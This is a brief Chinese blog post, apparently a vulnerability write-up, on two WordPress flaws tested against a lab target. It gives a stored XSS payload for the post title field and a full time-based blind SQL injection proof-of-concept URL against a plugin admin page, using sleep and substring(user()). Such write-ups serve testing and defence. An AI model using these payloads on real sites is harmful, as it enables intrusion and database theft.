进入到wp的后台页面
选择add new板块,可见在编辑器的Add Title中,后台未对用户输入进行妥善的过滤或者正确转码,导致看到文章的用户都受到恶意代码的影响。
payload:
"><img src=1 onerror=alert("xss")>
复现过程:
点击右上角”Publish”发布后,进入博客主页,出现弹窗:
进一步的利用此处不详述。
该漏洞与wordpress本体的版本无关。
首先需要进入后台页面。
访问以下POC,会得到延时注入的效果:
http://[wordpress靶场地址]/wp-admin/admin.php?page=submissions_fm&task=display¤t_id=2&order_by=group_id&asc_or_desc=,(case+when+(select+ascii(substring(user(),1,1)))%3d114+then+(select+sleep(5)+from+wp_users+limit+1)+else+2+end)+asc%3b
响应如下,可见存在sql注入漏洞:
后续进行正常注入流程即可。
打赏我,让我更有动力~
© 2016 - 2024 掌控者 All Rights Reserved.